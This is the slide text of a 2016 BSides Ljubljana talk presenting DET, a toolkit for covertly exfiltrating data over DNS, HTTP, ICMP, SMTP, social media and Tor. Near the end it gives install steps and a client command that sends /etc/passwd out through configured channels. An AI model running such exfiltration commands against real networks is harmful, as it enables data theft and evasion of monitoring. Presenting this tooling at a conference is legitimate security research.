
Introducing (DET) the Data Exfiltration Toolkit


A talk by Paul Amar (@paulwebsec) about DET, a tool for stealthily exfiltrating data from an internal network, given at BSides Ljubljana 2016.


  1. Introducing DET (Data Exfiltration Toolkit) Paul Amar - BSides Ljubljana - 09/03/2016
  2. 100
  3. General Approach TCP DNS HTTP ICMP SMTP
  4. General Approach TCP DNS HTTP ICMP SMTP
  5. General Approach TCP DNS HTTP ICMP SMTP
  6. General Approach TCP DNS HTTP ICMP SMTP
  7. General Approach TCP DNS HTTP ICMP SMTP
  8. General Approach TCP DNS HTTP ICMP SMTP
  9. HammerToss (July 2015)
  10. What’s available today?
  11. What’s available today? And many more... created almost every day. Not kidding.
  12. Current state TCP DNS HTTP ICMP Twitter DMs SMTP (e.g. Gmail)
  13. Introducing DET
  14. Configuration file (JSON format)
  15. File to exfiltrate
  16. Folder to exfiltrate / multi-threaded
  17. Plugin(s) to use
  18. Plugin(s) to exclude
  19. Server mode
  20. Configuration file: list all your plugins and their configuration
  21. Configuration file: each plugin has its own configuration (username, pwd, …)
  22. Configuration file: additional configuration (XOR key, sleeping time, …)
  23. Let’s dig a bit (client-side)
  24. “Registration” phase 1/2
  25. “Registration” phase 2/2
  26. Sending the data 1/2
  27. Sending the data 2/2
  28. “End” phase 1/2
  29. “End” phase 2/2
  30. So in a few words...
  31. But wait! There’s moar.
  32. Additional plugins (Tor integration) 1/2 Source: http://foxglovesecurity.com/2015/11/02/hack-like-the-bad-guys-using-tor-for-firewall-evasion-and-anonymous-remote-access/
  33. Additional plugins (Tor integration) 2/2
  34. “Experimental” plugins
  35. What’s next - Port DET *entirely* to PowerShell (plugin based, “Empire”-like) - More plugins! - Data obfuscation layer using Markov chains - https://github.com/bwall/markovobfuscate
  36. Installation. Get/install it: git clone https://github.com/sensepost/DET ; pip install -r requirements --user (install dependencies for the local user). Client side: python det.py -f /etc/passwd -c ./config.json (or PS scripts). Server side: python det.py -L -c ./config.json
  37. sys.exit(0) Paul Amar (paul@sensepost.com) / @PaulWebSec